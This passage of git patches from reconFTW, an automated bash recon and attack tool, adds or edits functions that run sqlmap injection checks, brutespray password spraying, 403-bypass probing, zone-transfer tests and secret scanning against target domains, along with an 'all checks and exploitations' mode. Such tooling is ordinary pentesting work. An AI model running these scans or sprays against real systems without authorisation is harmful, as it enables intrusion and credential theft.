$called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function sqli(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SQLI" = true ] && [ -s "gf/sqli.txt" ] + then + start_func "SQLi checks" + cat gf/sqli.txt | qsreplace FUZZ | anew -q .tmp/tmp_sqli.txt + interlace -tL .tmp/tmp_sqli.txt -threads 10 -c "python3 $tools/sqlmap/sqlmap.py -u _target_ -b --batch --disable-coloring --random-agent --output-dir=sqlmap" &>/dev/null + end_func "Results are saved in sqlmap folder" ${FUNCNAME[0]} + else + if [ "$SQLI" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + elif [ ! -s "gf/sqli.txt" ]; then + printf "\n${yellow} ${FUNCNAME[0]} No URLs potentially vulnerables to SQLi ${reset}\n\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function test_ssl(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$TEST_SSL" = true ] + then + start_func "SSL Test" + eval $tools/testssl.sh/testssl.sh --quiet --color 0 -U -iL hosts/ips.txt $DEBUG_ERROR > hosts/testssl.txt + end_func "Results are saved in hosts/testssl.txt" ${FUNCNAME[0]} + else + if [ "$TEST_SSL" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function spraying(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SPRAY" = true ] + then + start_func "Password spraying" + cd $tools/brutespray + eval python3 $tools/brutespray/brutespray.py --file $dir/.tmp/nmap_grep.gnmap --threads $BRUTESPRAY_THREADS --hosts $BRUTESPRAY_CONCURRENCE -o $dir/hosts/brutespray.txt $DEBUG_STD + cd $dir + end_func "Results are saved in hosts/brutespray.txt" ${FUNCNAME[0]} + else + if [ "$SPRAY" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function 4xxbypass(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$BYPASSER4XX" = true ] + then + start_func "403 bypass" + eval cat fuzzing/*.txt $DEBUG_ERROR | egrep '^4' | egrep -v '^404' | cut -d ' ' -f3 | dirdar -only-ok > .tmp/dirdar.txt + eval cat .tmp/dirdar.txt $DEBUG_ERROR | sed -e '1,12d' | sed '/^$/d' | anew -q vulns/4xxbypass.txt + end_func "Results are saved in vulns/4xxbypass.txt" ${FUNCNAME[0]} + else + if [ "$BYPASSER4XX" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +############################################################################################################### +########################################## OPTIONS & MGMT ##################################################### +############################################################################################################### + +function deleteOutScoped(){ + if [ -z "$1" ] + then + cat $1 | while read outscoped + do + if grep -q "^[*]" <<< $outscoped + then + outscoped="${outscoped:1}" + sed -i /"$outscoped$"/d $2 + else + sed -i /$outscoped/d $2 + fi + done + fi +} + +function getElapsedTime { + runtime="" + local T=$2-$1 + local D=$((T/60/60/24)) + local H=$((T/60/60%24)) + local M=$((T/60%60)) + local S=$((T%60)) + (( $D > 0 )) && runtime="$runtime$D days, " + (( $H > 0 )) && runtime="$runtime$H hours, " + (( $M > 0 )) && runtime="$runtime$M minutes, " + runtime="$runtime$S seconds." +} + +function isAsciiText { + IS_ASCII="False"; + if [[ $(file $1 | grep -o 'ASCII text$') == "ASCII text" ]] + then + IS_ASCII="True"; + else + IS_ASCII="False"; + fi +} + +function output(){ + mkdir -p $dir_output + mv $dir $dir_output +} + +function notification(){ + if [ ! -z "$1" ] && [ ! -z "$2" ] + then + case $2 in + info) + text="\n${bblue} ${1} ${reset}" + printf "${text}\n" && printf "${text} - ${domain}\n" | $NOTIFY + ;; + warn) + text="\n${yellow} ${1} ${reset}" + printf "${text}\n" && printf "${text} - ${domain}\n" | $NOTIFY + ;; + error) + text="\n${bred} ${1} ${reset}" + printf "${text}\n" && printf "${text} - ${domain}\n" | $NOTIFY + ;; + good) + text="\n${bgreen} ${1} ${reset}" + printf "${text}\n" && printf "${text} - ${domain}\n" | $NOTIFY + ;; + esac + fi +} + +function start_func(){ + printf "${bgreen}#######################################################################" + notification "${1}" info + start=`date +%s` +} + +function end_func(){ + touch $called_fn_dir/.${2} + end=`date +%s` + getElapsedTime $start $end + notification "${2} Finished in ${runtime}" info + printf "${bblue} ${1} ${reset}\n" + printf "${bgreen}#######################################################################${reset}\n" +} + +function start_subfunc(){ + notification "${1}" warn + start_sub=`date +%s` +} + +function end_subfunc(){ + touch $called_fn_dir/.${2} + end_sub=`date +%s` + getElapsedTime $start_sub $end_sub + notification "${1} in ${runtime}" good +} + +function start(){ + + global_start=`date +%s` + + if [ "$NOTIFICATION" = true ] ; then + NOTIFY="notify -silent" + else + NOTIFY="" + fi + + echo "Recon succesfully started on $domain" | $NOTIFY + tools_installed + + if [ -z "$domain" ] + then + if [ -n "$list" ] + then + if [ -z "$domain" ] + then + domain="Multi" + dir=$SCRIPTPATH/Recon/$domain + called_fn_dir=$dir/.called_fn + fi + if [[ "$list" = /* ]]; then + install -D $list $dir/webs/webs.txt + else + install -D $SCRIPTPATH/$list $dir/webs/webs.txt + fi + fi + else + dir=$SCRIPTPATH/Recon/$domain + called_fn_dir=$dir/.called_fn + fi + + if [ -z "$domain" ] + then + notification "\n\n${bred} No domain or list provided ${reset}\n\n" error + exit + fi + + if [ ! -d "$called_fn_dir" ] + then + mkdir -p $called_fn_dir + fi + + cd $dir + if [ ! -z "$domain" ] + then + echo $domain | anew -q target.txt + list=${dir}/target.txt + fi + mkdir -p .tmp osint subdomains webs hosts vulns + + if [ ! -z "$findomain_virustotal_token" ] + then + VT_API_KEY=$findomain_virustotal_token + fi + + printf "\n" + printf "${bred} Target: ${domain}\n\n" +} + +#Don't call me, I am not finished yet +function html_report(){ + eval cp "static/index.html" $dir $DEBUG_ERROR + #changing title to target.com + sed -i "s/CHANGE_ME_TITLE/$domain/g" "$dir/index.html" + #subdomains + lineToAppend="" + if [ -f "$dir/subdomains/subdomains.txt" ]; then + cat $dir/subdomains/subdomains.txt | while read sub; do lineToAppend="$lineToAppend
  • $sub

    • " ; done + else + lineToAppend="
  • No Subdomains Found For Target

    • " + fi + sed -i "s/CHANGE_ME_SUB_DOMAINS/$lineToAppend/g" "$dir/index.html" + #Screenshots + lineToAppend="" + + #OSINT + lineToAppend="" + # @TODO concatinate dorks and links and create a table cia HTML + tmpDorks=$(cat $dir/osint/gitdorks.txt | grep git | cut -d'|' -f 1 | cut -d'=' -f 2) + tmpLinks=$(cat $dir/osint/gitdorks.txt | grep git | cut -d'|' -f 2) +} + +function end(){ + find $dir -type f -empty | grep -v "called_fn" | xargs rm -f &>/dev/null + find $dir -type d -empty | grep -v "called_fn" | xargs rm -rf &>/dev/null + + if [ "$REMOVETMP" = true ] + then + rm -rf $dir/.tmp + fi + + if [ -n "$dir_output" ] + then + output + finaldir=$dir_output + else + finaldir=$dir + fi + global_end=`date +%s` + getElapsedTime $global_start $global_end + printf "${bgreen}#######################################################################${reset}\n" + text="${bred} Finished Recon on: ${domain} under ${finaldir} in: ${runtime} ${reset}\n" + printf "${text}" && printf "${text}" | $NOTIFY + printf "${bgreen}#######################################################################${reset}\n" + #Seperator for more clear messges in telegram_Bot + echo "****** Stay safe 🦠 and secure 🔐 ******" | $NOTIFY +} + +############################################################################################################### +########################################### MODES & MENUS ##################################################### +############################################################################################################### + +function passive(){ + start + domain_info + emails + google_dorks + github_dorks + metadata + SUBSCRAPING=false + WEBPROBESIMPLE=false + subdomains_full + favicon + PORTSCAN_ACTIVE=false + portscan + cloudprovider + end +} + +function all(){ + start + recon + 4xxbypass + cors + open_redirect + ssrf_checks + crlf_checks + lfi + ssti + sqli + xss + spraying + brokenLinks + test_ssl + end +} + +function recon(){ + domain_info + emails + google_dorks + github_dorks + metadata + subdomains_full + subtakeover + zonetransfer + s3buckets + webprobe_full + screenshot + favicon + portscan + cloudprovider + waf_checks + nuclei_check + cms_scanner + fuzz + params + urlchecks + url_gf + jschecks + wordlist_gen +} + +function multi_recon(){ + + + global_start=`date +%s` + + if [ "$NOTIFICATION" = true ] ; then + NOTIFY="notify -silent" + else + NOTIFY="" + fi + + if [ -s "$list" ] + then + targets=$(cat $list) + else + notification "Target list not provided" error + exit + fi + workdir=$SCRIPTPATH/Recon/$multi + mkdir -p $workdir && cd $workdir + mkdir -p .tmp .called_fn osint subdomains webs hosts vulns + + if [[ ! $(cat ~/.axiom/selected.conf | sed '/^\s*$/d' | wc -l) -gt 0 ]] + then + notification "\n\n${bred} No axiom instances selected ${reset}\n\n" error + exit + fi + + for domain in $targets; do + dir=$workdir/targets/$domain + called_fn_dir=$dir/.called_fn + mkdir -p $dir + cd $dir + mkdir -p .tmp .called_fn osint subdomains webs hosts vulns + domain_info + emails + google_dorks + github_dorks + metadata + subdomains_full + subtakeover + zonetransfer + webprobe_full + screenshot + favicon + done + cd $workdir + + notification "############################# Total data ############################" info + NUMOFLINES_users_total=$(find . -type f -name 'users.txt' -exec cat {} + | anew -q osint/users.txt | wc -l) + NUMOFLINES_pwndb_total=$(find . -type f -name 'passwords.txt' -exec cat {} + | anew -q osint/passwords.txt | wc -l) + NUMOFLINES_software_total=$(find . -type f -name 'software.txt' -exec cat {} + | anew -q osint/software.txt | wc -l) + NUMOFLINES_authors_total=$(find . -type f -name 'authors.txt' -exec cat {} + | anew -q osint/authors.txt | wc -l) + NUMOFLINES_subs_total=$(find . -type f -name 'subdomains.txt' -exec cat {} + | anew -q subdomains/subdomains.txt | wc -l) + NUMOFLINES_subtko_total=$(find . -type f -name 'takeover.txt' -exec cat {} + | anew -q webs/takeover.txt | wc -l) + NUMOFLINES_webs_total=$(find . -type f -name 'webs.txt' -exec cat {} + | anew -q webs/webs.txt | wc -l) + NUMOFLINES_webs_total=$(find . -type f -name 'webs_uncommon_ports.txt' -exec cat {} + | anew -q webs/webs_uncommon_ports.txt | wc -l) + + notification "- ${NUMOFLINES_users_total} total users found" good + notification "- ${NUMOFLINES_pwndb_total} total creds leaked" good + notification "- ${NUMOFLINES_software_total} total software found" good + notification "- ${NUMOFLINES_authors_total} total authors found" good + notification "- ${NUMOFLINES_subs_total} total subdomains" good + notification "- ${NUMOFLINES_subtko_total} total probably subdomain takeovers" good + notification "- ${NUMOFLINES_webs_total} total websites" good + + portscan + cloudprovider + s3buckets + waf_checks + nuclei_check + for domain in $targets; do + dir=$workdir/targets/$domain + cd $dir + cms_scanner + fuzz + params + urlchecks + url_gf + jschecks + wordlist_gen + done + cd $workdir + dir=$workdir + domain=$multi + end +} + +function subs_menu(){ + start + subdomains_full + subtakeover + zonetransfer + s3buckets + end +} + +function help(){ + printf "\n Usage: $0 [-d domain.tld] [-m name] [-l list.txt] [-x oos.txt] [-i in.txt] " + printf "\n [-r] [-s] [-p] [-a] [-w] [-i] [-v] [-h] [--deep] [--fs] [-o OUTPUT]\n\n" + printf " ${bblue}TARGET OPTIONS${reset}\n" + printf " -d domain.tld Target domain\n" + printf " -m company Target company name\n" + printf " -l list.txt Targets list, one per line\n" + printf " -x oos.txt Exclude subdomains list (Out Of Scope)\n" + printf " -i in.txt Include subdomains list\n" + printf " \n" + printf " ${bblue}MODE OPTIONS${reset}\n" + printf " -r Recon - Full recon process (only recon without attacks)\n" + printf " -s Subdomains - Search subdomains, check tko and web probe\n" + printf " -p Passive - Performs only passive steps \n" + printf " -a All - Perform all checks and exploitations\n" + printf " -w Web - Just web checks from list provided${reset}\n" + printf " -v Verbose - Prints everything including errors, for debug purposes\n" + printf " -h Help - Show this help\n" + printf " \n" + printf " ${bblue}GENERAL OPTIONS${reset}\n" + printf " --deep Deep scan (Enable some slow options for deeper scan)\n" + printf " -o output/path Define output folder\n" + printf " \n" + printf " ${bblue}USAGE EXAMPLES${reset}\n" + printf " Recon:\n" + printf " ./reconftw.sh -d example.com -r\n" + printf " \n" + printf " Subdomain scanning with multiple targets:\n" + printf " ./reconftw.sh -l targets.txt -s\n" + printf " \n" + printf " Web scanning for subdomain list:\n" + printf " ./reconftw.sh -d example.com -l targets.txt -w\n" + printf " \n" + printf " Multidomain recon:\n" + printf " ./reconftw.sh -m company -l domainlist.txt -r\n" + printf " \n" + printf " Full recon with custom output and excluded subdomains list:\n" + printf " ./reconftw.sh -d example.com -x out.txt -a -o custom/path\n" +} + +############################################################################################################### +########################################### START SCRIPT ##################################################### +############################################################################################################### + +banner + +check_version + +if [ -z "$1" ] +then + help + tools_installed + exit +fi + +while getopts ":hd:-:l:m:x:i:varspxwo:" opt; do + general=$@ + if [[ $general == *"-v"* ]]; then + unset DEBUG_STD + unset DEBUG_ERROR + fi + if [[ $general == *"--deep"* ]]; then + DEEP=true + fi + case ${opt} in + + ## TARGETS + + m ) multi=$OPTARG + ;; + d ) domain=$OPTARG + ;; + l ) list=$OPTARG + ;; + x ) outOfScope_file=$OPTARG + isAsciiText $outOfScope_file + if [ "False" = "$IS_ASCII" ] + then + printf "\n\n${bred} Out of Scope file is not a text file${reset}\n\n" + exit + fi + ;; + i ) inScope_file=$OPTARG + isAsciiText $inScope_file + if [ "False" = "$IS_ASCII" ] + then + printf "\n\n${bred} In Scope file is not a text file${reset}\n\n" + exit + fi + ;; + + ## MODES + + r ) if [ ! -z "$multi" ] + then + multi_recon + exit + fi + if [ -n "$list" ] + then + for domain in $(cat $list); do + start + recon + end + done + else + start + recon + end + fi + exit + ;; + s ) if [ -n "$list" ] + then + for domain in $(cat $list); do + subs_menu + done + else + subs_menu + fi + exit + ;; + a ) if [ -n "$list" ] + then + for domain in $(cat $list); do + all + done + else + all + fi + exit + ;; + w ) start + if [ -n "$list" ] + then + if [[ "$list" = /* ]]; then + cp $list $dir/webs/webs.txt + else + cp $SCRIPTPATH/$list $dir/webs/webs.txt + fi + fi + subtakeover + s3buckets + waf_checks + nuclei_check + cms_scanner + fuzz + 4xxbypass + cors + params + urlchecks + url_gf + jschecks + wordlist_gen + open_redirect + ssrf_checks + crlf_checks + lfi + ssti + sqli + xss + spraying + brokenLinks + test_ssl + end + exit + ;; + p ) if [ -n "$list" ] + then + for domain in $(cat $list); do + passive + done + else + passive + fi + exit + ;; + o ) dir_output=$OPTARG + output + ;; + \? | h | : | - | * ) + help + ;; + esac +done +shift $((OPTIND -1)) From aa042760eb034588ed9cca2c220a2a7821b3a2fa Mon Sep 17 00:00:00 2001 From: six2dez Date: Thu, 22 Apr 2021 09:42:13 +0200 Subject: [PATCH 16/19] Removed parallelism and added more error control --- reconftw.sh | 36 ++++++++++++++++++++++-------------- reconftw_axiom.sh | 29 +++++++++++++++++++---------- 2 files changed, 41 insertions(+), 24 deletions(-) diff --git a/reconftw.sh b/reconftw.sh index 4fbfe7b6..1e73bfc6 100755 --- a/reconftw.sh +++ b/reconftw.sh @@ -320,27 +320,26 @@ function sub_passive(){ if [ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ] then start_subfunc "Running : Passive Subdomain Enumeration" - eval subfinder -d $domain -o .tmp/subfinder_psub.txt $DEBUG_STD & - eval assetfinder --subs-only $domain $DEBUG_ERROR | anew -q .tmp/assetfinder_psub.txt & - eval amass enum -passive -d $domain -config $AMASS_CONFIG -o .tmp/amass_psub.txt $DEBUG_STD & - eval findomain --quiet -t $domain -u .tmp/findomain_psub.txt $DEBUG_STD & - eval crobat -s $domain $DEBUG_ERROR | anew -q .tmp/crobat_psub.txt & + eval subfinder -d $domain -o .tmp/subfinder_psub.txt $DEBUG_STD + eval assetfinder --subs-only $domain $DEBUG_ERROR | anew -q .tmp/assetfinder_psub.txt + eval amass enum -passive -d $domain -config $AMASS_CONFIG -o .tmp/amass_psub.txt $DEBUG_STD + eval findomain --quiet -t $domain -u .tmp/findomain_psub.txt $DEBUG_STD + eval crobat -s $domain $DEBUG_ERROR | anew -q .tmp/crobat_psub.txt if [ -s "${GITHUB_TOKENS}" ];then if [ "$DEEP" = true ] ; then - eval github-subdomains -d $domain -t $GITHUB_TOKENS -o .tmp/github_subdomains_psub.txt $DEBUG_STD & + eval github-subdomains -d $domain -t $GITHUB_TOKENS -o .tmp/github_subdomains_psub.txt $DEBUG_STD else - eval github-subdomains -d $domain -k -q -t $GITHUB_TOKENS -o .tmp/github_subdomains_psub.txt $DEBUG_STD & + eval github-subdomains -d $domain -k -q -t $GITHUB_TOKENS -o .tmp/github_subdomains_psub.txt $DEBUG_STD fi fi - eval curl -s "https://jldc.me/anubis/subdomains/${domain}" $DEBUG_ERROR | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sed '/^\./d' | anew -q .tmp/jldc_psub.txt & - timeout 10m waybackurls $domain | unfurl --unique domains | anew -q .tmp/waybackurls_psub.txt & - timeout 10m gauplus -t $GAUPLUS_THREADS -random-agent -subs $domain | unfurl --unique domains | anew -q .tmp/gau_psub.txt & + eval curl -s "https://jldc.me/anubis/subdomains/${domain}" $DEBUG_ERROR | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sed '/^\./d' | anew -q .tmp/jldc_psub.txt + timeout 10m waybackurls $domain | unfurl --unique domains | anew -q .tmp/waybackurls_psub.txt + timeout 10m gauplus -t $GAUPLUS_THREADS -random-agent -subs $domain | unfurl --unique domains | anew -q .tmp/gau_psub.txt if echo $domain | grep -q ".mil$"; then mildew mv mildew.out .tmp/mildew.out cat .tmp/mildew.out | grep ".$domain$" | anew -q .tmp/mil_psub.txt fi - wait $(jobs -rp) NUMOFLINES=$(eval cat .tmp/*_psub.txt $DEBUG_ERROR | sed "s/*.//" | anew .tmp/passive_subs.txt | wc -l) end_subfunc "${NUMOFLINES} new subs (passive)" ${FUNCNAME[0]} else @@ -571,7 +570,10 @@ function zonetransfer(){ then start_func "Zone transfer check" eval python3 $tools/dnsrecon/dnsrecon.py -d $domain -a -j subdomains/zonetransfer.json $DEBUG_STD - if grep -q "\"zone_transfer\"\: \"success\"" subdomains/zonetransfer.json ; then notification "Zone transfer found on ${domain}!" info; fi + if [ -s "subdomains/zonetransfer.json" ] + then + if grep -q "\"zone_transfer\"\: \"success\"" subdomains/zonetransfer.json ; then notification "Zone transfer found on ${domain}!" info; fi + fi end_func "Results are saved in subdomains/zonetransfer.txt" ${FUNCNAME[0]} else if [ "$ZONETRANSFER" = false ]; then @@ -988,14 +990,20 @@ function jschecks(){ printf "${yellow} Running : Resolving JS Urls 2/5${reset}\n" cat js/jsfile_links.txt | httpx -follow-redirects -random-agent -silent -timeout 15 -threads $HTTPX_THREADS -status-code -retries 2 -no-color | grep "[200]" | cut -d ' ' -f1 | anew -q js/js_livelinks.txt printf "${yellow} Running : Gathering endpoints 3/5${reset}\n" - interlace -tL js/js_livelinks.txt -threads 10 -c "python3 $tools/LinkFinder/linkfinder.py -d -i _target_ -o cli >> .tmp/js_endpoints.txt" &>/dev/null + if [ -s "js/js_livelinks.txt" ] + then + interlace -tL js/js_livelinks.txt -threads 10 -c "python3 $tools/LinkFinder/linkfinder.py -d -i _target_ -o cli >> .tmp/js_endpoints.txt" &>/dev/null + fi if [ -s ".tmp/js_endpoints.txt" ] then eval sed -i '/^\//!d' .tmp/js_endpoints.txt $DEBUG_STD cat .tmp/js_endpoints.txt | anew -q js/js_endpoints.txt.txt fi printf "${yellow} Running : Gathering secrets 4/5${reset}\n" - cat js/js_livelinks.txt | eval nuclei -silent -t ~/nuclei-templates/exposures/ -r $resolvers_trusted -o js/js_secrets.txt $DEBUG_STD + if [ -s "js/js_livelinks.txt" ] + then + cat js/js_livelinks.txt | eval nuclei -silent -t ~/nuclei-templates/exposures/ -r $resolvers_trusted -o js/js_secrets.txt $DEBUG_STD + fi printf "${yellow} Running : Building wordlist 5/5${reset}\n" if [ -s "js/js_livelinks.txt" ] then diff --git a/reconftw_axiom.sh b/reconftw_axiom.sh index 920dfc70..ad2fd2ad 100755 --- a/reconftw_axiom.sh +++ b/reconftw_axiom.sh @@ -320,13 +320,13 @@ function sub_passive(){ if [ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ] then start_subfunc "Running : Passive Subdomain Enumeration" - echo "/home/op/go/bin/subfinder -d ${domain}" > .tmp/sub_passive_commands.txt - echo "/home/op/go/bin/assetfinder --subs-only ${domain}" >> .tmp/sub_passive_commands.txt - echo "amass enum -passive -d ${domain}" >> .tmp/sub_passive_commands.txt - echo "/usr/bin/findomain --quiet -t ${domain}" >> .tmp/sub_passive_commands.txt - echo "timeout 10m /home/op/go/bin/waybackurls ${domain} | /home/op/go/bin/unfurl --unique domains" >> .tmp/sub_passive_commands.txt - echo "timeout 10m /home/op/go/bin/gau ${domain} | /home/op/go/bin/unfurl --unique domains" >> .tmp/sub_passive_commands.txt - eval axiom-scan .tmp/sub_passive_commands.txt -m exec -o .tmp/axiom_psub.txt $DEBUG_STD + + eval axiom-scan $list -m subfinder -o .tmp/subfinder_psub.txt $DEBUG_STD + eval axiom-scan $list -m assetfinder -o .tmp/assetfinder_psub.txt $DEBUG_STD + eval axiom-scan $list -m amass -o .tmp/amass_psub.txt $DEBUG_STD + eval axiom-scan $list -m findomain -o .tmp/findomain_psub.txt $DEBUG_STD + eval axiom-scan $list -m waybackurls -o .tmp/waybackurls_psub_tmp.txt $DEBUG_STD && eval cat .tmp/waybackurls_psub_tmp.txt $DEBUG_ERROR | unfurl --unique domains | anew -q .tmp/waybackurls_psub.txt + eval axiom-scan $list -m gau -o .tmp/gau_psub_tmp.txt $DEBUG_STD && eval cat .tmp/gau_psub_tmp.txt $DEBUG_ERROR | unfurl --unique domains | anew -q .tmp/gau_psub.txt eval crobat -s $domain $DEBUG_ERROR | anew -q .tmp/crobat_psub.txt if [ -s "${GITHUB_TOKENS}" ];then if [ "$DEEP" = true ] ; then @@ -572,7 +572,10 @@ function zonetransfer(){ then start_func "Zone transfer check" eval python3 $tools/dnsrecon/dnsrecon.py -d $domain -a -j subdomains/zonetransfer.json $DEBUG_STD - if grep -q "\"zone_transfer\"\: \"success\"" subdomains/zonetransfer.json ; then notification "Zone transfer found on ${domain}!" info; fi + if [ -s "subdomains/zonetransfer.json" ] + then + if grep -q "\"zone_transfer\"\: \"success\"" subdomains/zonetransfer.json ; then notification "Zone transfer found on ${domain}!" info; fi + fi end_func "Results are saved in subdomains/zonetransfer.txt" ${FUNCNAME[0]} else if [ "$ZONETRANSFER" = false ]; then @@ -969,14 +972,20 @@ function jschecks(){ printf "${yellow} Running : Resolving JS Urls 2/5${reset}\n" eval axiom-scan js/jsfile_links.txt -m httpx -follow-host-redirects -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color -o .tmp/js_livelinks.txt $DEBUG_STD && cat .tmp/js_livelinks.txt | grep "[200]" | cut -d ' ' -f1 | anew -q js/js_livelinks.txt printf "${yellow} Running : Gathering endpoints 3/5${reset}\n" - interlace -tL js/js_livelinks.txt -threads 10 -c "python3 $tools/LinkFinder/linkfinder.py -d -i _target_ -o cli >> .tmp/js_endpoints.txt" &>/dev/null + if [ -s "js/js_livelinks.txt" ] + then + interlace -tL js/js_livelinks.txt -threads 10 -c "python3 $tools/LinkFinder/linkfinder.py -d -i _target_ -o cli >> .tmp/js_endpoints.txt" &>/dev/null + fi if [ -s ".tmp/js_endpoints.txt" ] then eval sed -i '/^\//!d' .tmp/js_endpoints.txt $DEBUG_STD cat .tmp/js_endpoints.txt | anew -q js/js_endpoints.txt.txt fi printf "${yellow} Running : Gathering secrets 4/5${reset}\n" - eval axiom-scan js/js_livelinks.txt -m nuclei -wL /home/op/recon/nuclei/nuclei-templates/exposed-tokens/ -r $resolvers_trusted -o nuclei_js/js_secrets.txt $DEBUG_STD + if [ -s "js/js_livelinks.txt" ] + then + eval axiom-scan js/js_livelinks.txt -m nuclei -wL /home/op/recon/nuclei/nuclei-templates/exposed-tokens/ -r $resolvers_trusted -o nuclei_js/js_secrets.txt $DEBUG_STD + fi printf "${yellow} Running : Building wordlist 5/5${reset}\n" if [ -s "js/js_livelinks.txt" ] then From 2464acf1f2566e113c4b351084102aa6024ce0c3 Mon Sep 17 00:00:00 2001 From: six2dez Date: Thu, 22 Apr 2021 17:57:25 +0200 Subject: [PATCH 17/19] Small fix --- install.sh | 1 + reconftw_axiom.sh | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/install.sh b/install.sh index e2af73ba..83889bc7 100755 --- a/install.sh +++ b/install.sh @@ -234,6 +234,7 @@ eval $SUDO chmod 755 /usr/local/bin/findomain eval $SUDO chmod 755 /usr/local/bin/gowitness eval $SUDO chmod 755 /usr/local/bin/DNScewl eval subfinder $DEBUG_STD +eval subfinder $DEBUG_STD printf "${bblue}\n Running: Downloading required files ${reset}\n\n" ## Downloads diff --git a/reconftw_axiom.sh b/reconftw_axiom.sh index ad2fd2ad..e175c00b 100755 --- a/reconftw_axiom.sh +++ b/reconftw_axiom.sh @@ -323,7 +323,7 @@ function sub_passive(){ eval axiom-scan $list -m subfinder -o .tmp/subfinder_psub.txt $DEBUG_STD eval axiom-scan $list -m assetfinder -o .tmp/assetfinder_psub.txt $DEBUG_STD - eval axiom-scan $list -m amass -o .tmp/amass_psub.txt $DEBUG_STD + eval axiom-scan $list -m amass -passive -o .tmp/amass_psub.txt $DEBUG_STD eval axiom-scan $list -m findomain -o .tmp/findomain_psub.txt $DEBUG_STD eval axiom-scan $list -m waybackurls -o .tmp/waybackurls_psub_tmp.txt $DEBUG_STD && eval cat .tmp/waybackurls_psub_tmp.txt $DEBUG_ERROR | unfurl --unique domains | anew -q .tmp/waybackurls_psub.txt eval axiom-scan $list -m gau -o .tmp/gau_psub_tmp.txt $DEBUG_STD && eval cat .tmp/gau_psub_tmp.txt $DEBUG_ERROR | unfurl --unique domains | anew -q .tmp/gau_psub.txt From 346add04ff27293c2964cd882ae51eb5334232df Mon Sep 17 00:00:00 2001 From: six2dez Date: Fri, 23 Apr 2021 10:11:25 +0200 Subject: [PATCH 18/19] Improved httpx uncommon ports and subs mode and fixes --- reconftw.cfg | 1 + reconftw.sh | 24 ++++++++++-------------- reconftw_axiom.sh | 43 +++++++++++++++++++++++++++++-------------- 3 files changed, 40 insertions(+), 28 deletions(-) diff --git a/reconftw.cfg b/reconftw.cfg index c185541f..8ca1de08 100644 --- a/reconftw.cfg +++ b/reconftw.cfg @@ -67,6 +67,7 @@ S3BUCKETS=true WEBPROBESIMPLE=true WEBPROBEFULL=true WEBSCREENSHOT=true +UNCOMMON_PORTS_WEB="81,300,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7396,7474,8000,8001,8008,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9001,9043,9060,9080,9090,9091,9200,9443,9502,9800,9981,10000,10250,11371,12443,15672,16080,17778,18091,18092,20720,32000,55440,55672" # Host FAVICON=true diff --git a/reconftw.sh b/reconftw.sh index 1e73bfc6..9ec58e93 100755 --- a/reconftw.sh +++ b/reconftw.sh @@ -496,7 +496,7 @@ function sub_permut(){ if [ -f ".tmp/permute_subs.txt" ] then deleteOutScoped $outOfScope_file .tmp/permute_subs.txt - NUMOFLINES=$(eval cat .tmp/permute_subs.txt $DEBUG_ERROR | grep "$domain$" | anew subdomains/subdomains.txt | wc -l) + NUMOFLINES=$(eval cat .tmp/permute_subs.txt $DEBUG_ERROR | grep ".$domain$" | anew subdomains/subdomains.txt | wc -l) else NUMOFLINES=0 fi @@ -618,18 +618,14 @@ function webprobe_simple(){ else cat subdomains/subdomains.txt | httpx -follow-host-redirects -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | cut -d ' ' -f1 | grep ".$domain$" | anew -q .tmp/probed_tmp.txt fi - deleteOutScoped $outOfScope_file .tmp/probed_tmp.txt NUMOFLINES=$(eval cat .tmp/probed_tmp.txt $DEBUG_ERROR | anew webs/webs.txt | wc -l) - end_subfunc "${NUMOFLINES} new websites resolved" ${FUNCNAME[0]} - if [ "$PROXY" = true ] && [ ! -z "$proxy_url" ] && [[ $(cat webs/webs.txt| wc -l) -le 1500 ]] then notification "Sending websites to proxy" info eval ffuf -mc all -w webs/webs.txt -u FUZZ -replay-proxy $proxy_url $DEBUG_STD fi - else if [ "$WEBPROBESIMPLE" = false ]; then printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" @@ -643,7 +639,8 @@ function webprobe_full(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$WEBPROBEFULL" = true ] then start_func "Http probing non standard ports" - cat subdomains/subdomains.txt | httpx -ports 